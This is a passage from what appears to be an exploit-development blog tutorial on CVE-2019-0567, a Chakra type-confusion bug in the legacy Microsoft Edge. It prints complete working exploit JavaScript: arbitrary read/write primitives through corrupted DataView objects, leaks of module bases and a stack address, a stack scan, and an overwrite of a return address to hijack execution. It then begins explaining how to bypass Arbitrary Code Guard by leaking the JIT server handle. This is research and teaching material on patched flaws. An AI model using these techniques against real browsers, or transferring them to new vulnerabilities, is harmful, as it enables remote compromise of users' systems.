However, we can clearly see that not only is this address committed to memory, it is within the known bounds of another thread’s stack as tracked by its TEB (note that the below diagram is confusing because the columns are unaligned. We are outlining the stack base and limit).

This means we can reliably locate a stack address for a currently executing thread! It is perfectly okay if we end up hijacking a return address within another thread. Because we have the ability to read/write anywhere within the process space, and because the “private” address space Windows provides is on a per-process basis, we can hijack any thread in the current process. In essence, it is perfectly valid to corrupt a return address on another thread to gain code execution. The “lower level details” are abstracted away from us when it comes to this concept, because regardless of which return address we overwrite, or when the thread terminates, the thread will have to return control-flow somewhere in memory. Since threads are constantly executing functions, we know that at some point the thread we are dealing with will be scheduled for execution and the corrupted return address will be used. If this makes no sense, do not worry. Our concept hasn’t changed in terms of overwriting a return address (be it in the current thread or another thread). We are not changing anything, from a foundational perspective, in terms of our stack leak and return address corruption between this blog post and part two of this blog series.

With that being said, here is how our exploit now looks with our stack leak.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x430 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1]);

    // Arbitrary read to get the threadContext pointer (offset 0x5c0 from scriptContext)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");
}
</script>

After running our exploit, we can see that we have successfully leaked a stack address.
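One caveat when reading the printed addresses: the exploit builds them as hex(high) + hex(low), and toString(16) drops leading zeros. If the low 32 bits happen to be something like 0x0000af60, the printed address comes out shorter than it should and points somewhere else entirely. Below is a minimal sketch of a padded formatter. hex64() is a hypothetical helper, not part of the original exploit, and it assumes String.prototype.padStart is available in the engine running the script.

```javascript
// Naive approach used for printing in the exploit: concatenate the two halves as-is
function naiveHex(lo, hi) {
    return "0x" + hi.toString(16) + lo.toString(16);
}

// Hypothetical helper: pad the low dword to 8 hex digits before concatenating.
// ">>> 0" coerces a possibly negative 32-bit value (e.g. from getInt32) to unsigned.
function hex64(lo, hi) {
    const low = (lo >>> 0).toString(16).padStart(8, "0");
    const high = (hi >>> 0).toString(16);
    return "0x" + high + low;
}

// Made-up address halves where the low dword has leading zeros
console.log(naiveHex(0x0000af60, 0x1c2));   // leading zeros of the low dword are lost
console.log(hex64(0x0000af60, 0x1c2));      // low dword is always 8 digits
```

For addresses whose low dword already uses all 8 hex digits, both functions print the same thing, which is why the issue is easy to miss.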

From our experimenting earlier, the offsets between the leaked stack addresses have a certain degree of variance between script runs. Because of this, there is no way for us to compute the base and limit of the stack from our leaked address, so we will forgo computing the stack limit. Instead, we will perform our stack scanning for return addresses starting from the address we have leaked. Let’s recall a previous image outlining the stack limit of the thread where we leaked a stack address at the time of the leak.

As we can see, we are towards the base of the stack. Since the stack grows “downwards” (the stack base is located at a higher address than the stack limit), we will do our scanning in “reverse” order in comparison to part two. For our purposes, we will do stack scanning by starting at our leaked stack address and traversing backwards towards the stack limit (which is the “lowest” address the stack can grow towards).

We already outlined in part two of this blog series the methodology I used in terms of leaking a return address to corrupt. As mentioned then, the process is as follows:

  1. Traverse the stack using read primitive
  2. Print out all contents of the stack that are possible to read
  3. Look for anything starting with 0x7fff, meaning an address from a loaded module like chakra.dll
  4. Disassemble the address to see if it is an actual return address
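Step 3 above can be sketched as a simple filter over the scan output. This is an illustration only: the entries are [offset from the leaked address, low dword, high dword], the only real value is the 0x7fff3a454a73 return address that appears later in this post, and isModulePointer() is a hypothetical helper. Anything that survives the filter still has to be disassembled (step 4) to confirm it is a return address.

```javascript
// A value "starts with 0x7fff" when its upper 32 bits are exactly 0x00007fff
function isModulePointer(hi) {
    return (hi >>> 0) === 0x7fff;
}

// Keep only the stack entries whose contents look like a pointer into a loaded module
function returnAddressCandidates(entries) {
    return entries.filter(([offset, lo, hi]) => isModulePointer(hi));
}

// Made-up scan output: [offset from leaked address, low dword, high dword]
const scanned = [
    [0x10, 0x00000000, 0x00000000],   // empty slot
    [0x18, 0x2affb000, 0x0000001c],   // stack-looking pointer (made up)
    [0x20, 0x3a454a73, 0x00007fff],   // module pointer
];

const candidates = returnAddressCandidates(scanned);
console.log("Candidates at offsets: " + candidates.map(([offset]) => "0x" + offset.toString(16)).join(", "));
```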

While omitting much of the code from our full exploit, a stack scan would look like this (a scan used just to print out return addresses):

(...)truncated(...)

// Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
// Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

// Print update
document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
document.write("<br>");

// Counter variable
let counter = 0x6000;

// Loop
while (counter != 0)
{
    // Store the contents of the stack
    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

    // Print update
    document.write("[+] Stack address 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));
    document.write("<br>");

    // Decrement the counter
    // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
    counter -= 0x8;
}

As we can see above, we do this in “reverse” order of our ChakraCore exploit in part two. Since we don’t have the luxury of already knowing where the stack limit is, which is the “last” address that can be used by that thread’s stack, we can’t just traverse the stack by incrementing. Instead, since we are leaking an address towards the “base” of the stack, we have to decrement (since the stack grows downwards) towards the stack limit.
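One detail worth keeping in mind with this loop: the address is handled as two 32-bit halves, and counter is added only to the low half. DataView's setUint32() wraps its value modulo 2^32, so if the low dword of the leaked address sits within 0x6000 bytes of 0xFFFFFFFF, the carry into the high dword is silently lost. Below is a minimal sketch of an add-with-carry helper. add64() is a hypothetical name, not something from the original exploit, and it assumes a small non-negative delta.

```javascript
// Add a small non-negative delta to a 64-bit address stored as two 32-bit halves
function add64(lo, hi, delta) {
    const sum = (lo >>> 0) + delta;                 // exact in a double, well below 2^53
    const newLo = sum >>> 0;                        // low 32 bits of the sum
    const carry = Math.floor(sum / 0x100000000);    // 1 if the low dword overflowed, else 0
    const newHi = (hi + carry) >>> 0;
    return [newLo, newHi];
}

// No overflow: behaves exactly like the plain addition in the loop
console.log(add64(0x00001000, 0x1c2, 0x6000));

// Overflow: the carry moves into the high dword instead of being dropped
console.log(add64(0xffffff00, 0x1c2, 0x6000));
```

In practice this case is uncommon, but it is one more possible cause of an otherwise unexplained access violation during the scan.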

In other words, less technically, we have leaked somewhere towards the “bottom” of the stack and we want to walk towards the “top of the stack” in order to scan for return addresses. You’ll notice a few things about the previous code, the first being the arbitrary 0x6000 number. This number was found by trial and error. I started with 0x1000 and ran the loop to see if the exploit crashed. I kept incrementing the number until a crash started to ensue. A crash in this case refers to the fact we are likely reading from decommitted memory, meaning we will cause an access violation. The “gist” of this is to basically see how many bytes you can read without crashing, and those are the return addresses you can choose from. Here is how our output looks.

As we start to scroll down through the output, we can clearly see some return addresses starting to bubble up!

Since I already mentioned the “trial and error” approach in part two, which consists of overwriting a return address (after confirming it is one) and seeing if you end up controlling the instruction pointer by corrupting it, I won’t show this process here again. Just know, as mentioned, that this is just a matter of trial and error (in terms of my approach). The return address that I found worked best for me was chakra!Js::JavascriptFunction::CallFunction<1>+0x83 (again, there is no “special” way to find it. I just started corrupting return addresses with 0x4141414141414141 and seeing if I caused an access violation with RIP containing the value 0x4141414141414141, or RSP pointing to this value at the time of the access violation).

This value can be seen in the stack leaking contents.

Why did I choose this return address? Again, it was an arduous process taking every stack address and overwriting it until one consistently worked. Additionally, a little less anecdotally, the symbol for this return address belongs to a function quite literally called CallFunction, which means it’s likely responsible for executing a function call of interpreted JavaScript. Because of this, we know a function will execute its code and then hand execution back to the caller via the return address. It is likely that this piece of code (the return address) will be executed, since it is responsible for calling a function. However, there are many other options that you could choose from.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x430 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1]);

    // Arbitrary read to get the threadContext pointer (offset 0x5c0 from scriptContext)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

    // Counter variable
    let counter = 0x6000;

    // Loop
    while (counter != 0)
    {
        // Store the contents of the stack
        tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

        // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
            document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
            // Decrement the counter
            // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
            counter -= 0x8;
        }
    }

    // Corrupt the return address to control RIP with 0x4141414141414141
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Open the updated exploit.html script and attach WinDbg before pressing the Click me to exploit CVE-2019-0567! button.

After attaching WinDbg and pressing g, go ahead and click the button (this may require clicking twice in some instances to detonate the exploit). Please note that there is a slight edge case where the return address isn’t located on the stack. If the debugger shows you crashing in the GetValue method, this is likely the cause. In my testing, I found the return address 10 out of 10 times, so not finding it is very rare, but it is possible.
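In the listing above, if the scan never finds the return address, the loop ends with counter at 0 and the write still happens at the leaked address itself. One way to make the edge case explicit is to have the scan report “not found” and only write on a hit. The sketch below is an assumption-laden illustration, not the exploit's code: findReturnAddress() and makeFakeRead() are hypothetical names, and the fake read function stands in for read64() so the logic can be run outside of Edge.

```javascript
// Scan downwards from leak+span to leak+8, 8 bytes at a time (same order as the loop above).
// Returns the offset of the first match, or null if the target is not present.
function findReturnAddress(readFn, leakLo, leakHi, target, span) {
    for (let offset = span; offset > 0; offset -= 8) {
        const value = readFn(leakLo + offset, leakHi);
        if (value[0] === target[0] && value[1] === target[1]) {
            return offset;
        }
    }
    return null;
}

// Hypothetical stand-in for read64(): entries are [addrLo, addrHi, valueLo, valueHi]
function makeFakeRead(entries) {
    const memory = new Map(entries.map(([lo, hi, valLo, valHi]) => [hi + ":" + lo, [valLo, valHi]]));
    return (lo, hi) => memory.get(hi + ":" + lo) || [0, 0];
}

// Made-up stack contents: the target return address sits 0x1238 bytes above the leak
const target = [0x3a454a73, 0x7fff];
const fakeRead = makeFakeRead([[0x2affa000 + 0x1238, 0x1c, 0x3a454a73, 0x7fff]]);

const hit = findReturnAddress(fakeRead, 0x2affa000, 0x1c, target, 0x6000);
const miss = findReturnAddress(makeFakeRead([]), 0x2affa000, 0x1c, target, 0x6000);

console.log(hit === null ? "[-] Return address not found" : "[+] Found at offset 0x" + hit.toString(16));
console.log(miss === null ? "[-] Return address not found, skipping the write" : "[+] Found");
```

With a check like this, the exploit can bail out (or retry) instead of corrupting an arbitrary stack slot when the return address is missing.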

After running exploit.html in the debugger, we can clearly see that we have overwritten a return address on the stack with 0x4141414141414141 and Edge is attempting to return into it. We have, again, successfully corrupted control-flow and can now redirect execution wherever we want in Edge. We went over all of this, as well, in part two of this blog series!

Now that we have our read/write primitive and control-flow hijacking ported to Edge, we can now begin our Edge-specific exploitation which involves many ROP chains to bypass Edge mitigations like Arbitrary Code Guard.

Arbitrary Code Guard && Code Integrity Guard

We are now at a point where our exploit has the ability to read/write memory, we control the instruction pointer, and we know where the stack is. With these primitives, exploitation should be as follows (in terms of where exploit development currently and traditionally is at):

  1. Bypass ASLR to determine memory layout (done)
  2. Achieve read/write primitive (done)
  3. Locate the stack (done)
  4. Control the instruction pointer (done)
  5. Write a ROP payload to the stack (TBD)
  6. Write shellcode to the stack (or somewhere else in memory) (TBD)
  7. Mark the stack (or regions where shellcode is) as RWX (TBD)
  8. Execute shellcode (TBD)

Steps 5 through 8 are required as a result of DEP. DEP, a mitigation which has been beaten to death, separates code and data segments of memory. The stack, being a data segment of memory (it is only there to hold data), is not executable whenever DEP is enabled. Because of this, we invoke a function like VirtualProtect (via ROP) to mark the region of memory we wrote our shellcode to (which is a data segment that allows data to be written to it) as RWX. I have documented this procedure time and time again. We leak an address (or abuse non-ASLR modules, which is very rare now), we use our primitive to write to the stack (a stack-based buffer overflow in the two previous links provided), we mark the stack as RWX via ROP (the shellcode is also on the stack), and we are now allowed to execute our shellcode since it’s in an RWX region of memory. With that said, let me introduce a new mitigation into the fold - Arbitrary Code Guard (ACG).

ACG is a mitigation which prohibits any dynamically-generated RWX memory. This is manifested in a few ways, pointed out by Matt Miller in his blog post on ACG. As Matt points out:

“With ACG enabled, the Windows kernel prevents a content process from creating and modifying code pages in memory by enforcing the following policy:

  1. Code pages are immutable. Existing code pages cannot be made writable and therefore always have their intended content. This is enforced with additional checks in the memory manager that prevent code pages from becoming writable or otherwise being modified by the process itself. For example, it is no longer possible to use VirtualProtect to make an image code page become PAGE_EXECUTE_READWRITE.

  2. New, unsigned code pages cannot be created. For example, it is no longer possible to use VirtualAlloc to create a new PAGE_EXECUTE_READWRITE code page.”

What this means is that an attacker can write their shellcode to a data portion of memory (like the stack) all they want, gladly. However, the permissions needed (e.g. the memory must be explicitly marked executable by the adversary) can never be achieved with ACG enabled. At a high level, no memory permissions in Edge (specifically content processes, where our exploit lives) can be modified (we can’t write our shellcode to a code page nor can we modify a data page to execute our shellcode).

Now, you may be thinking - “Connor, instead of executing native shellcode in this manner, why don’t you just use WinExec like in your previous exploit from part two of this blog series to spawn cmd.exe or some other application to download some staged DLL and just load it into the process space?” This is a perfectly valid thought - and, thus, has already been addressed by Microsoft.

Edge has another small mitigation known as “no child processes”. This nukes any ability to spawn a child process to go inject some shellcode into another process, or load a DLL. Not only that, even if there was no mitigation for child processes, there is a “sister” mitigation to ACG called Code Integrity Guard (CIG) which also is present in Edge.

CIG essentially says that only Microsoft-signed DLLs can be loaded into the process space. So, even if we could reach out to retrieve a staged DLL and get it onto the system, it isn’t possible for us to load it into the content process, as the DLL isn’t a signed DLL (assuming the DLL is a malicious one, it wouldn’t be signed).

So, to summarize, in Edge we cannot:

  1. Use VirtualProtect to mark the stack where our shellcode is as RWX in order to execute it
  2. Use VirtualProtect to make a code page (RX memory) writable in order to write our shellcode to this region of memory (using something like a WriteProcessMemory ROP chain)
  3. Allocate RWX memory within the current process space using VirtualAlloc
  4. Allocate RW memory with VirtualAlloc and then mark it as RX
  5. Allocate RX memory with VirtualAlloc and then mark it as RW
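The list above can be condensed into two rules: data can never become code, and code can never become writable. Below is a toy model of those two rules, written only to make the summary concrete. It is not how the Windows kernel implements ACG, the function names are hypothetical, and protections are simplified to strings like "RW", "RX" and "RWX".

```javascript
// Toy model only: a protection is a string such as "R", "RW", "RX" or "RWX"
const canExecute = (prot) => prot.includes("X");
const canWrite = (prot) => prot.includes("W");

// VirtualAlloc-style request: new executable memory is refused
function acgAllowsAlloc(prot) {
    return !canExecute(prot);
}

// VirtualProtect-style request on existing memory
function acgAllowsProtect(from, to) {
    if (!canExecute(from) && canExecute(to)) return false;  // data page cannot become code
    if (canExecute(from) && canWrite(to)) return false;     // code page cannot become writable
    return true;
}

console.log("1. stack RW -> RWX:   " + acgAllowsProtect("RW", "RWX"));
console.log("2. code RX -> RWX:    " + acgAllowsProtect("RX", "RWX"));
console.log("3. allocate RWX:      " + acgAllowsAlloc("RWX"));
console.log("4. alloc RW, then RX: " + (acgAllowsAlloc("RW") && acgAllowsProtect("RW", "RX")));
console.log("5. alloc RX, then RW: " + (acgAllowsAlloc("RX") && acgAllowsProtect("RX", "RW")));
```

Every line prints false. Note that in this model item 5 already fails at the allocation step, since the RX allocation would be a new unsigned code page.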

With the advent of all three of these mitigations, previous exploitation strategies are all thrown out of the window. Let’s talk about how this changes our exploit strategy, now knowing we cannot just execute shellcode directly within the content process.

CVE-2017-8637 - Combining Vulnerabilities

As we hinted at, and briefly touched on earlier in this blog post, we know that something has to be done about JIT code with ACG enabled. This is because, by default, JIT code is generated as RWX. If we think about it, JIT’d code first starts out as an “empty” allocation (just like when we allocate some memory with VirtualAlloc). This memory is first marked as RW (it is writable because Chakra needs to actually write the code that will be executed into the allocation). We know that since there is no execute permission on this RW allocation, and this allocation has code that needs to be executed, the JIT engine has to change the region of memory to RX after it’s generated. This means the JIT engine has to generate dynamic code that has its memory permissions changed. Because of this, no JIT code can really be generated in an Edge process with ACG enabled. As pointed out in Matt’s blog post (and briefly mentioned by us), this architectural issue was addressed as follows:

“Modern web browsers achieve great performance by transforming JavaScript and other higher-level languages into native code. As a result, they inherently rely on the ability to generate some amount of unsigned native code in a content process. Enabling JIT compilers to work with ACG enabled is a non-trivial engineering task, but it is an investment that we’ve made for Microsoft Edge in the Windows 10 Creators Update. To support this, we moved the JIT functionality of Chakra into a separate process that runs in its own isolated sandbox. The JIT process is responsible for compiling JavaScript to native code and mapping it into the requesting content process. In this way, the content process itself is never allowed to directly map or modify its own JIT code pages.”

As we have already seen in this blog post, two processes are generated (JIT server and content process) and the JIT server is responsible for taking the JavaScript code from the content process and transforming it into machine code. This machine code is then mapped back into the content process with appropriate permissions (like that of the .text section, RX). The vulnerability (CVE-2017-8637) mentioned in this section of the blog post took advantage of a flaw in this architecture to compromise Edge fully and, thus, bypass ACG. Let’s talk a bit about the architecture of the JIT server and content process communication channel first (please note that this vulnerability has been patched).

The last thing to note, however, is where Matt says that the JIT process was moved “…into a separate process that runs in its own isolated sandbox”. Notice how Matt did not say that it was moved into an ACG-compliant process (as we know, ACG isn’t compatible with JIT). Although the JIT process may be “sandboxed” it does not have ACG enabled. It does, however, have CIG and “no child processes” enabled. We will be taking advantage of the fact the JIT process doesn’t (and still to this day doesn’t, although the new V8 version of Edge only has ACG support in a special mode) have ACG enabled. With our ACG bypass, we will leverage a vulnerability with the way Chakra-based Edge managed communications (specifically via a process handle stored within the content process) to and from the JIT server. With that said, let’s move on.

Leaking The JIT Server Handle

The content process uses an RPC channel in order to communicate with the JIT server/process. I found this out by opening chakra.dll within IDA and searching for any functions which looked interesting and contained the word “JIT”. I found an interesting function named JITManager::ConnectRpcServer. What stood out to me immediately was a call to the function DuplicateHandle within JITManager::ConnectRpcServer.

If we look at ChakraCore we can see the source (which should be close between Chakra and ChakraCore) for this function. What was very interesting about this function is the fact that the first argument this function accepts is seemingly a “handle to the JIT process”.

Since chakra.dll contains the functionality of the Chakra JavaScript engine and since chakra.dll, as we know, is loaded into the content process - this functionality is accessible through the content process (where our exploit is running). This implies that at some point the content process is doing something with what seems to be a handle to the JIT server. However, we know that the value of jitProcessHandle is supplied by the caller (e.g. the function which actually invokes JITManager::ConnectRpcServer). Using IDA, we can look for cross-references to this function to see what function is responsible for calling JITManager::ConnectRpcServer.

Taking a look at the above image, we can see the function ScriptEngine::SetJITConnectionInfo is responsible for calling JITManager::ConnectRpcServer and, thus, also for providing the JIT handle to the function. Let’s look at ScriptEngine::SetJITConnectionInfo to see exactly how this function provides the JIT handle to JITManager::ConnectRpcServer.

We know that the __fastcall calling convention is in use, and that the first argument of JITManager::ConnectRpcServer (as we saw in the ChakraCore code) is where the JIT handle goes. So, if we look at the above image, whatever is in RCX directly prior to the call to JITManager::ConnectRpcServer will be the JIT handle. We can see this value is gathered from a symbol called s_jitManager.

We know that this is the value that is going to be passed to the JITManager::ConnectRpcServer function in the RCX register - meaning that this symbol has to contain the handle to the JIT server. Let’s look once more at JITManager::ConnectRpcServer (this time with some additional annotation).

We already know that RCX = s_jitManager when this function is executed. Looking deeper into the disassembly (almost directly before the DuplicateHandle call) we can see that s_jitManager+0x8 (a.k.a RCX at an offset of 0x8) is loaded into R14. R14 is then used as the lpTargetHandle parameter for the call to DuplicateHandle. Let’s take a look at DuplicateHandle’s prototype (don’t worry if this is confusing, I will provide a summation of the findings very shortly to make sense of this).

